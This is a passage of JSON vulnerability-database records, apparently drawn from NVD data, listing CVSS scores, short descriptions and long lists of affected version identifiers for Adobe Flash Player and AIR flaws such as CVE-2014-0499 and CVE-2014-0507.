"cpe:/a:adobe:flash_player:11.1.111.54", "cpe:/a:adobe:adobe_air:1.0.4990", "cpe:/a:adobe:adobe_air:1.5.0.7220", "cpe:/a:adobe:flash_player:11.2.202.273", "cpe:/a:adobe:flash_player:11.3.300.271", "cpe:/a:adobe:adobe_air_sdk:3.7.0.1860", "cpe:/a:adobe:adobe_air:3.0.0.4080", "cpe:/a:adobe:flash_player:11.2.202.275", "cpe:/a:adobe:flash_player:12.0.0.41", "cpe:/a:adobe:adobe_air:1.5.3", "cpe:/a:adobe:flash_player:11.2.202.327", "cpe:/a:adobe:adobe_air:3.1.0.488", "cpe:/a:adobe:adobe_air_sdk:3.5.0.600", "cpe:/a:adobe:adobe_air:1.5", "cpe:/a:adobe:flash_player:11.7.700.257", "cpe:/a:adobe:flash_player:11.3.300.257", "cpe:/a:adobe:flash_player:11.7.700.252", "cpe:/a:adobe:flash_player:11.2.202.251", "cpe:/a:adobe:adobe_air_sdk:4.0.0.1628", "cpe:/a:adobe:flash_player:11.9.900.152", "cpe:/a:adobe:flash_player:11.9.900.117", "cpe:/a:adobe:adobe_air:1.0.1", "cpe:/a:adobe:flash_player:11.1", "cpe:/a:adobe:flash_player:11.2.202.280", "cpe:/a:adobe:flash_player:11.2.202.235", "cpe:/a:adobe:flash_player:11.5.502.135", "cpe:/a:adobe:adobe_air:1.1.0.5790", "cpe:/a:adobe:flash_player:11.2.202.341", "cpe:/a:adobe:adobe_air:2.7.0.1948", "cpe:/a:adobe:flash_player:11.2.202.297", "cpe:/a:adobe:flash_player:11.7.700.169", "cpe:/a:adobe:flash_player:11.2.202.233", "cpe:/a:adobe:adobe_air:2.5.1.17730", "cpe:/a:adobe:adobe_air:3.7.0.1530", "cpe:/a:adobe:flash_player:11.4.402.265", "cpe:/a:adobe:flash_player:11.6.602.171"], "id": "CVE-2014-0508", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0508", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:11.2.202.243:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.9.0.1030:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.6:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.268:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.232:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.9.0.1380:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.341:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.115.48:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.5.502.149:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.8.0.1430:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.9.900.152:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.169:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.291:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.273:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.4.0.2710:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.7.0.1530:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.102.55:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.9.0.1060:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.5.0.16600:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.115.34:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.5.0.600:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.4.402.287:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.8.800.97:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.270:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.8.0.870:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.8.0.910:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.8.0.910:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.273:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.260:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.346:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.0.1.153:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:12.0.0.43:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7.1.19610:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.3.0.3690:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.332:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.5.0.890:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7.0.19480:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.2.0.2070:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.280:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.242:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.6.602.180:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.8.800.168:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.327:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.335:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.262:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.5.0.600:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.1.8210:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.270:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.6.602.168:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.5.502.135:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.5.502.110:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.6.0.19120:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.2.0.2070:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.1.0.488:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.4.0.2540:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.115.7:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.111.54:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.0.4990:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.111.50:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.9.900.117:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.6.0.6090:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.5.502.136:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.2.0.207:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.257:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.6.602.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.236:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.0.0.4080:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7.0.1953:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.6.0.597:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.115.58:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.285:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.252:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.224:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:4.0.0.1390:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.258:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.102.63:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:4.0.0.1628:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:12.0.0.38:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.3.9130:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.228:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.6.602.171:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.9.0.1030:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.257:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.238:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.336:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.4.402.265:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.251:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.310:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.6.0.6090:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.3.0.3670:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.8.800.94:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.9.0.1210:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.4.402.278:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.102.62:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.1.0.488:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.5.0.880:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.0.1.152:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7.0.1948:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.111.8:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.275:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.1.0.5790:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.7.0.2090:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.3.13070:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.5.0.1060:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.5.0.890:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.5.1.17730:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.1.0.4880:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.9.0.1210:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.0.8.4990:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.102.59:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.4.0.2710:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.2.12610:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.271:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.0.7220:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.9.900.170:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.5.0.880:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7.0.19530:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.7.0.1860:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.265:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:4.0.0.1390:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.7.0.1860:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.297:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.202:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.3.0.3650:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.0.0.4080:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.8.0.870:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.111.44:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.5.502.146:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.7.0.1530:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.5.0.1060:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.9.0.1380:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.6.0.19140:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.1.0.485:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.4.0.2540:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.115.54:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.261:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.223:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.6.0.599:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.3.9120:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.262:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.7.0.2090:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:12.0.0.41:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.0.0.408:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-20T13:51:01", "description": "Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 do not prevent access to address information, which makes it easier for attackers to bypass the ASLR protection mechanism via unspecified vectors.", "cvss3": {}, "published": "2014-02-21T05:07:00", "type": "cve", "title": "CVE-2014-0499", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0499"], "modified": "2018-12-13T15:54:00", "cpe": [], "id": "CVE-2014-0499", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0499", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "cpe23": []}, {"lastseen": "2023-09-20T14:04:20", "description": "Buffer overflow in Adobe Flash Player before 11.7.700.275 and 11.8.x through 13.0.x before 13.0.0.182 on Windows and OS X and before 11.2.202.350 on Linux, Adobe AIR before 13.0.0.83 on Android, Adobe AIR SDK before 13.0.0.83, and Adobe AIR SDK & Compiler before 13.0.0.83 allows attackers to execute arbitrary code via unspecified vectors.", "cvss3": {}, "published": "2014-04-08T23:55:00", "type": "cve", "title": "CVE-2014-0507", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0507"], "modified": "2017-12-16T02:29:00", "cpe": ["cpe:/a:adobe:adobe_air:2.7.0.19480", "cpe:/a:adobe:adobe_air_sdk:3.8.0.870", "cpe:/a:adobe:flash_player:11.5.502.110", "cpe:/a:adobe:flash_player:12.0.0.38", "cpe:/a:adobe:adobe_air:3.8.0.910", "cpe:/a:adobe:adobe_air:3.3.0.3670", "cpe:/a:adobe:flash_player:11.1.115.54", "cpe:/a:adobe:adobe_air:3.4.0.2710", "cpe:/a:adobe:flash_player:11.6.602.167", "cpe:/a:adobe:flash_player:11.2.202.228", "cpe:/a:adobe:adobe_air:3.8.0.870", "cpe:/a:adobe:flash_player:11.2.202.291", "cpe:/a:adobe:flash_player:11.4.402.287", "cpe:/a:adobe:flash_player:11.3.300.270", "cpe:/a:adobe:flash_player:11.2.202.346", "cpe:/a:adobe:flash_player:11.0.1.152", "cpe:/a:adobe:adobe_air:3.5.0.1060", "cpe:/a:adobe:adobe_air:2.7.1", "cpe:/a:adobe:adobe_air:2.6.0.19120", "cpe:/a:adobe:flash_player:11.1.111.8", "cpe:/a:adobe:flash_player:11.2.202.238", "cpe:/a:adobe:flash_player:11.7.700.202", "cpe:/a:adobe:flash_player:11.8.800.94", "cpe:/a:adobe:adobe_air:3.5.0.890", "cpe:/a:adobe:flash_player:11.7.700.232", "cpe:/a:adobe:adobe_air_sdk:3.8.0.1430", "cpe:/a:adobe:flash_player:11.1.111.44", "cpe:/a:adobe:flash_player:11.2.202.335", "cpe:/a:adobe:flash_player:11.1.115.7", "cpe:/a:adobe:adobe_air:2.7.0.19530", "cpe:/a:adobe:adobe_air_sdk:3.5.0.1060", "cpe:/a:adobe:flash_player:11.2.202.261", "cpe:/a:adobe:adobe_air:3.5.0.600", "cpe:/a:adobe:flash_player:11.7.700.242", "cpe:/a:adobe:flash_player:11.1.115.58", "cpe:/a:adobe:adobe_air:3.1.0.4880", "cpe:/a:adobe:adobe_air:2.6", "cpe:/a:adobe:adobe_air:1.1", "cpe:/a:adobe:flash_player:11.7.700.260", "cpe:/a:adobe:flash_player:11.1.102.63", "cpe:/a:adobe:adobe_air_sdk:3.9.0.1030", "cpe:/a:adobe:adobe_air_sdk:3.8.0.910", "cpe:/a:adobe:flash_player:11.2.202.236", "cpe:/a:adobe:adobe_air_sdk:3.9.0.1210", "cpe:/a:adobe:flash_player:11.0.1.153", "cpe:/a:adobe:flash_player:11.3.300.273", "cpe:/a:adobe:flash_player:11.3.300.262", "cpe:/a:adobe:adobe_air:1.5.1.8210", "cpe:/a:adobe:adobe_air:4.0.0.1390", "cpe:/a:adobe:flash_player:11.1.102.55", "cpe:/a:adobe:adobe_air_sdk:3.3.0.3690", "cpe:/a:adobe:adobe_air:2.0.4", "cpe:/a:adobe:flash_player:11.2.202.332", "cpe:/a:adobe:adobe_air_sdk:3.6.0.599", "cpe:/a:adobe:adobe_air:3.2.0.2070", "cpe:/a:adobe:flash_player:11.7.700.224", "cpe:/a:adobe:adobe_air:3.1.0.485", "cpe:/a:adobe:adobe_air:2.6.0.19140", "cpe:/a:adobe:flash_player:11.2.202.285", "cpe:/a:adobe:adobe_air:3.2.0.207", "cpe:/a:adobe:adobe_air:2.0.2", "cpe:/a:adobe:adobe_air:2.0.3.13070", "cpe:/a:adobe:flash_player:11.2.202.243", "cpe:/a:adobe:flash_player:11.5.502.149", "cpe:/a:adobe:flash_player:11.2.202.223", "cpe:/a:adobe:flash_player:11.2.202.336", "cpe:/a:adobe:adobe_air_sdk:3.9.0.1380", "cpe:/a:adobe:adobe_air_sdk:3.6.0.6090", "cpe:/a:adobe:flash_player:11.5.502.146", "cpe:/a:adobe:flash_player:11.6.602.168", "cpe:/a:adobe:adobe_air_sdk:3.5.0.880", "cpe:/a:adobe:adobe_air_sdk:3.7.0.1530", "cpe:/a:adobe:adobe_air:2.7.0.1953", "cpe:/a:adobe:adobe_air:3.9.0.1060", "cpe:/a:adobe:adobe_air:3.9.0.1380", "cpe:/a:adobe:adobe_air:2.7.1.19610", "cpe:/a:adobe:flash_player:11.6.602.180", "cpe:/a:adobe:flash_player:11.2.202.258", "cpe:/a:adobe:adobe_air:3.7.0.2090", "cpe:/a:adobe:adobe_air:2.5.0.16600", "cpe:/a:adobe:adobe_air:1.5.3.9120", "cpe:/a:adobe:flash_player:12.0.0.43", "cpe:/a:adobe:adobe_air:3.6.0.6090", "cpe:/a:adobe:flash_player:11.1.115.34", "cpe:/a:adobe:adobe_air:3.9.0.1210", "cpe:/a:adobe:adobe_air:2.0.2.12610", "cpe:/a:adobe:adobe_air:3.9.0.1030", "cpe:/a:adobe:flash_player:11.2.202.270", "cpe:/a:adobe:flash_player:11.5.502.136", "cpe:/a:adobe:adobe_air_sdk:3.1.0.488", "cpe:/a:adobe:adobe_air_sdk:3.0.0.4080", "cpe:/a:adobe:flash_player:11.2.202.310", "cpe:/a:adobe:flash_player:11.1.111.50", "cpe:/a:adobe:flash_player:11.1.115.48", "cpe:/a:adobe:flash_player:11.1.102.59", "cpe:/a:adobe:flash_player:11.9.900.170", "cpe:/a:adobe:adobe_air:1.0", "cpe:/a:adobe:adobe_air:2.7", "cpe:/a:adobe:flash_player:11.8.800.168", "cpe:/a:adobe:adobe_air:3.0.0.408", "cpe:/a:adobe:adobe_air:1.0.8.4990", "cpe:/a:adobe:adobe_air:2.0.3", "cpe:/a:adobe:flash_player:11.3.300.265", "cpe:/a:adobe:adobe_air:3.6.0.597", "cpe:/a:adobe:flash_player:11.4.402.278", "cpe:/a:adobe:adobe_air:3.7.0.1860", "cpe:/a:adobe:adobe_air_sdk:3.7.0.2090", "cpe:/a:adobe:adobe_air_sdk:3.4.0.2540", "cpe:/a:adobe:adobe_air_sdk:3.2.0.2070", "cpe:/a:adobe:adobe_air:1.5.1", "cpe:/a:adobe:adobe_air:1.5.3.9130", "cpe:/a:adobe:flash_player:11.0", "cpe:/a:adobe:adobe_air_sdk:4.0.0.1390", "cpe:/a:adobe:flash_player:11.1.102.62", "cpe:/a:adobe:flash_player:11.3.300.268", "cpe:/a:adobe:adobe_air_sdk:3.5.0.890", "cpe:/a:adobe:adobe_air_sdk:3.4.0.2710", "cpe:/a:adobe:adobe_air:1.5.2", "cpe:/a:adobe:flash_player:11.8.800.97", "cpe:/a:adobe:adobe_air_sdk:3.3.0.3650", "cpe:/a:adobe:adobe_air:3.5.0.880", "cpe:/a:adobe:flash_player:11.2.202.262", "cpe:/a:adobe:adobe_air:3.4.0.2540", "cpe:/a:adobe:flash_player:11.1.111.54", "cpe:/a:adobe:adobe_air:1.0.4990", "cpe:/a:adobe:adobe_air:1.5.0.7220", "cpe:/a:adobe:flash_player:11.2.202.273", "cpe:/a:adobe:flash_player:11.3.300.271", "cpe:/a:adobe:adobe_air_sdk:3.7.0.1860", "cpe:/a:adobe:adobe_air:3.0.0.4080", "cpe:/a:adobe:flash_player:11.2.202.275", "cpe:/a:adobe:flash_player:12.0.0.41", "cpe:/a:adobe:adobe_air:1.5.3", "cpe:/a:adobe:flash_player:11.2.202.327", "cpe:/a:adobe:adobe_air:3.1.0.488", "cpe:/a:adobe:adobe_air_sdk:3.5.0.600", "cpe:/a:adobe:flash_player:11.7.700.257", "cpe:/a:adobe:adobe_air:1.5", "cpe:/a:adobe:flash_player:11.3.300.257", "cpe:/a:adobe:flash_player:11.7.700.252", "cpe:/a:adobe:flash_player:11.2.202.251", "cpe:/a:adobe:adobe_air_sdk:4.0.0.1628", "cpe:/a:adobe:flash_player:11.9.900.152", "cpe:/a:adobe:flash_player:11.9.900.117", "cpe:/a:adobe:flash_player:11.1", "cpe:/a:adobe:adobe_air:1.0.1", "cpe:/a:adobe:flash_player:11.2.202.280", "cpe:/a:adobe:flash_player:11.2.202.235", "cpe:/a:adobe:flash_player:11.5.502.135", "cpe:/a:adobe:flash_player:11.2.202.341", "cpe:/a:adobe:adobe_air:1.1.0.5790", "cpe:/a:adobe:adobe_air:2.7.0.1948", "cpe:/a:adobe:flash_player:11.7.700.169", "cpe:/a:adobe:flash_player:11.2.202.297", "cpe:/a:adobe:flash_player:11.2.202.233", "cpe:/a:adobe:adobe_air:2.5.1.17730", "cpe:/a:adobe:adobe_air:3.7.0.1530", "cpe:/a:adobe:flash_player:11.4.402.265", "cpe:/a:adobe:flash_player:11.6.602.171"], "id": "CVE-2014-0507", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0507", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:11.2.202.243:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.9.0.1030:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.6:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.268:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.232:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.341:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.9.0.1380:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.115.48:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.5.502.149:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.8.0.1430:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.9.900.152:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.169:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.291:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.273:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.4.0.2710:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.102.55:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.7.0.1530:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.9.0.1060:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.5.0.16600:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.115.34:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.5.0.600:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.4.402.287:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.8.800.97:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.270:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.8.0.870:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.273:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.8.0.910:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.260:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.8.0.910:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.346:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.0.1.153:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:12.0.0.43:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7.1.19610:*:*:*:*:*:*:*", 